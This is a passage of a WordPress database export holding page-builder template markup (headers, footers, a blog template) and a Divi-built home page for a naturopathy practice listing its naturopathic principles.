fa-phone-alt\",\"ele_bg_hover_delay\":\"400\",\"space\":\"15\",\"icon_color\":\"#ffffffff\",\"color\":\"#ffffffff\",\"pagelayer-id\":\"5fp9526\"} /-->\n<!-- wp:pagelayer/pl_iconbox {\"service_icon\":\"fas fa-fax\",\"service_alignment\":\"left\",\"service_vertical_alignment\":\"top\",\"service_icon_view\":\"default\",\"service_icon_padding\":\"15\",\"service_icon_state\":\"normal\",\"service_icon_color\":\"#ffffffff\",\"service_icon_font_size\":\"20\",\"service_icon_hover_delay\":\"400\",\"service_bor_state\":\"normal\",\"service_heading\":\"044 355 588\",\"service_title_spacing\":\"4,0,10,15\",\"heading_state\":\"normal\",\"service_heading_color\":\"#ffffffff\",\"service_heading_typo\":\",14,,500,,,Solid,,,,\",\"heading_delay\":\"400\",\"service_text_alignment\":\"left\",\"service_btn_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"service_icon_spacing\":\"0,0,0,0\",\"service_text\":\"\",\"heading_alignment\":\"left\",\"pagelayer-id\":\"m2e2175\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"3\",\"pagelayer-id\":\"tal1411\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"color\":\"#fbfbfbff\",\"ele_bg_hover_delay\":\"400\",\"align\":\"left\",\"heading_typo\":\",28,,600,,,Solid,,Uppercase,,\",\"ele_padding\":\"0px,0px,19px,0px\",\"text\":\"\\nQuick Links\",\"pagelayer-id\":\"6771572\"} -->Quick Links<!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_wp_menu {\"nav_list\":\"2\",\"align\":\"left\",\"layout\":\"vertical\",\"pointer\":\"\",\"m_animation\":\"slide\",\"list_style\":\"none\",\"submenu_ind\":\"caret-down\",\"menu_bg_color_hover\":\"\",\"menu_bg_color_active\":\"\",\"horizontal_padding\":\"5\",\"vertical_padding\":\"3\",\"submenu_color\":\"#ffffff\",\"submenu_bg_color\":\"#0986c0\",\"submenu_horizontal_padding\":\"10\",\"submenu_vertical_padding\":\"10\",\"submenu_left_margin\":\"10\",\"menu_toggle_align\":\"center\",\"menu_toggle_bg_color\":\"#0986c050\",\"menu_toggle_size\":\"30\",\"slide_style\":\"pagelayer-wp_menu-right\",\"menu_width\":\"30\",\"menu_items_width\":\"100\",\"menu_posy\":\"8\",\"menu_bg\":\"color\",\"close_size\":\"25\",\"close_padding\":\"8\",\"close_color\":\"#ffffff68\",\"close_bg_color\":\"#00000036\",\"close_hover_delay\":\"600\",\"close_color_hover\":\"#ffffff\",\"close_bg_color_hover\":\"#000000\",\"submenu_position\":\"left\",\"menu_items_bg\":\"#ffffff\",\"menu_color_active\":\"#efba6cff\",\"submenu_align\":\"left\",\"pagelayer-id\":\"3gx8701\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_bg_type\":\"color\",\"ele_bg_color\":\"#ffffffff\",\"pagelayer-id\":\"q4i6655\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"6\",\"pagelayer-id\":\"ft23408\"} -->\n<!-- wp:pagelayer/pl_copyright {\"ele_bg_hover_delay\":\"400\",\"color\":\" \",\"align\":\"left\",\"typography\":\",,,,,,Solid,,Uppercase,,\",\"align_tablet\":\"center\",\"align_mobile\":\"center\",\"copyright_text\":\"\\u00a9 2020 Softino\",\"pagelayer-id\":\"u1c1489\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"6\",\"pagelayer-id\":\"0ns1349\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"color\":\"#111111\",\"ele_bg_hover_delay\":\"400\",\"align\":\"right\",\"heading_typo\":\",,,,,,Solid,,Uppercase,,\",\"align_tablet\":\"center\",\"align_mobile\":\"center\",\"text\":\"Terms and condition\",\"pagelayer-id\":\"7is9751\"} -->Terms and condition<!-- /wp:pagelayer/pl_heading -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->','Footer','','publish','closed','closed','','footer','','','2021-04-30 12:05:05','2021-04-30 12:05:05','',0,'https://verde.desidrivers.com.au/?p=17',0,'pagelayer-template','',0),(18,0,'2021-04-30 12:05:05','2021-04-30 12:05:05','<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"column_pos\":\"default\",\"content_pos\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_bg_type\":\"image\",\"ele_bg_color\":\"#ffffffff\",\"ele_margin\":\"0%,0%,0%,0%\",\"ele_margin_tablet\":\"0%,0%,0%,0%\",\"ele_margin_mobile\":\"0%,0%,0%,0%\",\"ele_padding\":\"0%,0%,0%,0%\",\"border_width\":\"0px,0px,3px,0px\",\"border_color\":\"#3498dbff\",\"ele_bg_img\":\"6\",\"overlay_type\":\"color\",\"overlay_transperancy\":\"0.5\",\"overlay_color\":\"#1d2021e0\",\"ele_bg_attachment\":\"scroll\",\"ele_bg_posx\":\"center\",\"ele_bg_posy\":\"center\",\"ele_bg_repeat\":\"no-repeat\",\"ele_bg_size\":\"cover\",\"pagelayer-id\":\"wcq1102\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"content_pos\":\"center\",\"col_width_tablet\":\"30\",\"pagelayer-id\":\"1o23762\"} -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"yh95948\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col_width_tablet\":\"30\",\"col_width_mobile\":\"60\",\"col_width\":\"0\",\"hide_desktop\":\"true\",\"pagelayer-id\":\"c4i5588\"} -->\n<!-- wp:pagelayer/pl_wp_title {\"site_name\":\"Tripo\",\"site_title_style\":\",22,,400,,,Solid,,Uppercase,,\",\"site_title_state\":\"normal\",\"text-align\":\"center\",\"ele_bg_hover_delay\":\"400\",\"title_color\":\"#ffffffff\",\"ele_align\":\"margin\",\"ele_height\":\"auto\",\"text-align_tablet\":\"center\",\"text-align_mobile\":\"center\",\"site_logo\":\"true\",\"logo_img_size\":\"custom\",\"align\":\"top\",\"vertical_align\":\"middle\",\"logo_img_type\":\"custom-logo\",\"logo_img\":\"15\",\"logo_img_custom_size\":\"10\",\"logo_img_custom_size_tablet\":\"30\",\"ele_margin_tablet\":\"0px,0px,0px,0px\",\"logo_img_custom_size_mobile\":\"30\",\"hide_desktop\":\"true\",\"ele_css\":\"@media screen and (max-width: 768px){\\n{{element}} .pagelayer-wp-title-align-top{\\ndisplay: flex;\\n}\\n}\",\"pagelayer-id\":\"s659115\"} /-->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col_width_tablet\":\"70\",\"col_width_mobile\":\"40\",\"col_width\":\"100\",\"pagelayer-id\":\"20q7733\"} -->\n<!-- wp:pagelayer/pl_wp_menu {\"nav_list\":\"2\",\"align\":\"center\",\"layout\":\"horizontal\",\"pointer\":\"\",\"m_animation\":\"slide\",\"list_style\":\"none\",\"submenu_ind\":\"caret-down\",\"menu_bg_color_hover\":\"\",\"horizontal_padding\":\"20\",\"vertical_padding\":\"14\",\"submenu_color\":\"#ffffff\",\"submenu_bg_color\":\"#3e8ef7ff\",\"submenu_horizontal_padding\":\"10\",\"submenu_vertical_padding\":\"10\",\"submenu_left_margin\":\"10\",\"menu_toggle_align\":\"center\",\"menu_toggle_bg_color\":\"#eeaa6dff\",\"menu_toggle_size\":\"30\",\"ele_bg_hover_delay\":\"400\",\"submenu_position\":\"left\",\"menu_bg_color_active\":\"\",\"close_hover_delay\":\"600\",\"ele_padding\":\"0px,0px,0px,0px\",\"ele_align\":\"margin\",\"ele_height\":\"auto\",\"align_tablet\":\"center\",\"align_mobile\":\"center\",\"ele_margin\":\"20px,0px,20px,0px\",\"slide_style\":\"pagelayer-wp_menu-right\",\"menu_width\":\"30\",\"menu_items_width\":\"100\",\"menu_posy\":\"8\",\"menu_bg\":\"color\",\"close_size\":\"25\",\"close_padding\":\"8\",\"close_color\":\"#ffffff68\",\"close_bg_color\":\"#00000036\",\"close_color_hover\":\"#ffffff\",\"close_bg_color_hover\":\"#000000\",\"menu_items_bg\":\"#070606d8\",\"drop_breakpoint\":\"tablet\",\"menu_toggle_size_tablet\":\"22\",\"menu_toggle_padding_tablet\":\"12\",\"ele_margin_tablet\":\"0px,0px,0px,0px\",\"menu_posy_mobile\":\"30\",\"menu_width_mobile\":\"60\",\"ele_css\":\"{{element}} .pagelayer-wp_menu-ul a {\\n justify-content: unset !important; }\\n@media screen and (max-width: 768px){\\n.pagelayer-menu-type-dropdown .pagelayer-wp_menu-ul{\\nmargin-top: 60px;\\n}\\n}\",\"menu_width_tablet\":\"60\",\"menu_toggle_size_mobile\":\"22\",\"menu_toggle_align_tablet\":\"right\",\"menu_toggle_align_mobile\":\"right\",\"ele_padding_mobile\":\"0px,0px,0px,0px\",\"ele_margin_mobile\":\"1px,1px,1px,1px\",\"submenu_align\":\"left\",\"pagelayer-id\":\"bwx8299\"} /-->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_margin_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"u787917\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"3\",\"pagelayer-id\":\"r7b7759\"} -->\n<!-- wp:pagelayer/pl_wp_title {\"site_name\":\"Tripo\",\"site_title_style\":\",22,,400,,,Solid,,Uppercase,,\",\"site_title_state\":\"normal\",\"text-align\":\"center\",\"ele_bg_hover_delay\":\"400\",\"title_color\":\"#ffffffff\",\"ele_align\":\"margin\",\"ele_height\":\"auto\",\"text-align_tablet\":\"center\",\"text-align_mobile\":\"center\",\"site_logo\":\"true\",\"logo_img_size\":\"custom\",\"align\":\"top\",\"vertical_align\":\"middle\",\"logo_img_type\":\"custom-logo\",\"logo_img\":\"15\",\"logo_img_custom_size\":\"10\",\"logo_img_custom_size_tablet\":\"14\",\"ele_margin_tablet\":\"-50px,0px,0px,0px\",\"logo_img_custom_size_mobile\":\"30\",\"hide_tablet\":\"true\",\"hide_mobile\":\"true\",\"pagelayer-id\":\"9ce3680\"} /-->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"heading_typo_tablet\":\",40,,,,,Solid,1.5,,,\",\"heading_typo_mobile\":\",25,,,,,Solid,1.6,,,\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_padding_tablet\":\"1px,1px,1px,1px\",\"ele_margin\":\"0em,5em,0em,5em\",\"text\":\"\\u003ch2\\u003eLet\'s enjoy the wonders of \\u003cspan style=\\u0022color: #EFBA6C\\u0022\\u003enature\\u003c\\/span\\u003e\\u003c\\/h2\\u003e\",\"color\":\"#ffffffff\",\"pagelayer-id\":\"qq94916\"} --><h2>Let\'s enjoy the wonders of <span style=\"color: #EFBA6C\">nature</span></h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"ele_css\":\"{{element}} .pagelayer-heading-holder{\\nletter-spacing: 30px;\\n}\",\"ele_margin\":\"-10em,0em,0em,0em\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin_tablet\":\"2px,2px,2px,2px\",\"ele_margin_mobile\":\"1px,1px,1px,1px\",\"text\":\"\\u003ch1\\u003eTravel\\u003c\\/h1\\u003e\",\"pagelayer-id\":\"2tn2581\"} --><h1>Travel</h1><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"m368984\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"2\",\"pagelayer-id\":\"ng01904\"} -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"8\",\"pagelayer-id\":\"ugs9620\"} -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003cp style=\\u0022text-align: center\\u0022\\u003e\\u003cspan style=\\u0022font-size: 16px\\u0022\\u003eLorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.\\u003c\\/span\\u003e\\u003c\\/p\\u003e\",\"pagelayer-id\":\"f3y8092\"} --><p style=\"text-align: center\"><span style=\"font-size: 16px\">Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.</span></p><!-- /wp:pagelayer/pl_text -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"2\",\"pagelayer-id\":\"k5d7203\"} -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"center\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"50\",\"icon_size\":\"25\",\"color_scheme\":\"\",\"icon_color\":\"#ffffffff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"ele_bg_hover_delay\":\"400\",\"icon_spacing_tablet\":\"30\",\"icon_spacing_mobile\":\"10\",\"animation\":\"\",\"animation_delay\":\"600\",\"pagelayer-id\":\"47a3125\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https:\\/\\/facebook.com\\/sitepad\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"uyy8241\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https:\\/\\/twitter.com\\/sitepad\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"idq2225\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-instagram\",\"social_url\":\"https:\\/\\/www.instagram.com\\/sitepad\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"s3t3042\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-pinterest-p\",\"social_url\":\"https:\\/\\/pinterest.com\\/sitepad\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"w372035\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->','Home Header','','publish','closed','closed','','home-header','','','2021-04-30 12:05:05','2021-04-30 12:05:05','',0,'https://verde.desidrivers.com.au/?p=18',0,'pagelayer-template','',0),(19,0,'2021-04-30 12:05:05','2021-04-30 12:05:05','<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"column_pos\":\"default\",\"content_pos\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_bg_type\":\"\",\"ele_bg_color\":\"#ffffffff\",\"ele_margin\":\"0%,0%,0%,0%\",\"ele_margin_tablet\":\"0%,0%,0%,0%\",\"ele_margin_mobile\":\"0%,0%,0%,0%\",\"ele_padding\":\"0%,0%,0%,0%\",\"border_width\":\"0px,0px,3px,0px\",\"border_color\":\"#3498dbff\",\"overlay_type\":\"color\",\"overlay_transperancy\":\"0.5\",\"overlay_color\":\"#1d2021e0\",\"ele_bg_img\":\"\",\"ele_zindex\":\"5\",\"ele_sticky_pos\":\"top\",\"ele_sticky_on\":\"desktop\",\"pagelayer-id\":\"gd37640\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"content_pos\":\"center\",\"col_width_tablet\":\"30\",\"col_width_mobile\":\"50\",\"col_width\":\"30\",\"pagelayer-id\":\"uvj4753\"} -->\n<!-- wp:pagelayer/pl_wp_title {\"site_name\":\"Tripo\",\"site_title_style\":\",26,,400,,,Solid,,Uppercase,,\",\"site_title_state\":\"normal\",\"text-align\":\"center\",\"ele_bg_hover_delay\":\"400\",\"title_color\":\"#ffffffff\",\"ele_align\":\"margin\",\"ele_height\":\"auto\",\"text-align_tablet\":\"center\",\"text-align_mobile\":\"center\",\"site_logo\":\"true\",\"logo_img_size\":\"custom\",\"align\":\"left\",\"vertical_align\":\"middle\",\"logo_img_type\":\"custom-logo\",\"logo_img\":\"15\",\"logo_img_custom_size\":\"20\",\"logo_img_custom_size_tablet\":\"32\",\"ele_margin_tablet\":\"0px,0px,0px,0px\",\"logo_img_custom_size_mobile\":\"30\",\"pagelayer-id\":\"6fk8126\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"content_pos\":\"center\",\"col_width_tablet\":\"70\",\"col_width_mobile\":\"30\",\"col_width\":\"70\",\"pagelayer-id\":\"hh33089\"} -->\n<!-- wp:pagelayer/pl_wp_menu {\"nav_list\":\"2\",\"align\":\"right\",\"layout\":\"horizontal\",\"pointer\":\"\",\"m_animation\":\"slide\",\"list_style\":\"none\",\"submenu_ind\":\"caret-down\",\"menu_bg_color_hover\":\"\",\"horizontal_padding\":\"20\",\"vertical_padding\":\"14\",\"submenu_color\":\"#ffffff\",\"submenu_bg_color\":\"#3e8ef7ff\",\"submenu_horizontal_padding\":\"10\",\"submenu_vertical_padding\":\"10\",\"submenu_left_margin\":\"10\",\"menu_toggle_align\":\"center\",\"menu_toggle_bg_color\":\"#eeaa6dff\",\"menu_toggle_size\":\"30\",\"ele_bg_hover_delay\":\"400\",\"submenu_position\":\"left\",\"menu_bg_color_active\":\"\",\"close_hover_delay\":\"600\",\"ele_padding\":\"0px,0px,0px,0px\",\"ele_align\":\"margin\",\"ele_height\":\"auto\",\"align_tablet\":\"center\",\"align_mobile\":\"center\",\"ele_margin\":\"0px,0px,0px,0px\",\"slide_style\":\"pagelayer-wp_menu-right\",\"menu_width\":\"30\",\"menu_items_width\":\"100\",\"menu_posy\":\"8\",\"menu_bg\":\"color\",\"close_size\":\"25\",\"close_padding\":\"8\",\"close_color\":\"#ffffff68\",\"close_bg_color\":\"#00000036\",\"close_color_hover\":\"#ffffff\",\"close_bg_color_hover\":\"#000000\",\"menu_items_bg\":\"#070606d8\",\"drop_breakpoint\":\"tablet\",\"menu_toggle_size_tablet\":\"22\",\"menu_toggle_padding_tablet\":\"12\",\"ele_margin_tablet\":\"0px,0px,0px,0px\",\"menu_posy_mobile\":\"30\",\"menu_width_mobile\":\"60\",\"ele_css\":\"{{element}} .pagelayer-wp_menu-ul a {\\n justify-content: unset !important; }\\n@media screen and (max-width: 768px){\\n.pagelayer-menu-type-dropdown .pagelayer-wp_menu-ul{\\nmargin-top: 60px;\\n}\\n}\",\"menu_width_tablet\":\"60\",\"menu_toggle_align_tablet\":\"right\",\"menu_toggle_align_mobile\":\"right\",\"menu_toggle_size_mobile\":\"22\",\"submenu_align\":\"left\",\"menu_colors\":\"active\",\"pagelayer-id\":\"03x9948\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->','Header','','publish','closed','closed','','header','','','2021-04-30 12:05:05','2021-04-30 12:05:05','',0,'https://verde.desidrivers.com.au/?p=19',0,'pagelayer-template','',0),(20,0,'2021-04-30 12:05:05','2021-04-30 12:05:05','<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"rxt9000\"} -->\n<!-- wp:pagelayer/pl_col {\"overlay_hover_delay\":\"400\",\"pagelayer-id\":\"8cb2839\"} -->\n<!-- wp:pagelayer/pl_archive_title {\"align\":\"left\",\"typo\":\",,,,,,Solid,,,,\",\"ele_margin\":\"0px,0px,18px,0px\",\"font_size\":\"28\",\"pagelayer-id\":\"jwm8663\"} /-->\n<!-- wp:pagelayer/pl_archive_posts {\"type\":\"default\",\"columns\":\"3\",\"columns_mobile\":\"1\",\"col_gap\":\"20\",\"row_gap\":\"40\",\"data_padding\":\"5,5,5,5\",\"bg_color\":\"#ffffff\",\"show_thumb\":\"true\",\"show_title\":\"true\",\"meta\":\"author,date,comments\",\"meta_sep\":\"|\",\"show_content\":\"excerpt\",\"content_color\":\"#121212\",\"content_align\":\"left\",\"pagination\":\"number_prev_next\",\"thumb_size\":\"medium_large\",\"ratio\":\"0.7\",\"title_color\":\"#efba6cff\",\"title_typo\":\",18,,,,,Solid,1.6,,,\",\"exc_length\":\"10\",\"pagi_prev_text\":\"Previous\",\"pagi_next_text\":\"Next\",\"pagi_end_size\":\"1\",\"pagi_mid_size\":\"2\",\"pagi_align\":\"center\",\"columns_tablet\":\"1\",\"meta_color\":\"#444444ff\",\"pagelayer-id\":\"bl74343\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->','Blog Template','','publish','closed','closed','','blog-template','','','2021-04-30 12:05:05','2021-04-30 12:05:05','',0,'https://verde.desidrivers.com.au/?p=20',0,'pagelayer-template','',0),(317,1,'2021-06-04 20:45:05','2021-06-04 12:45:05','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" 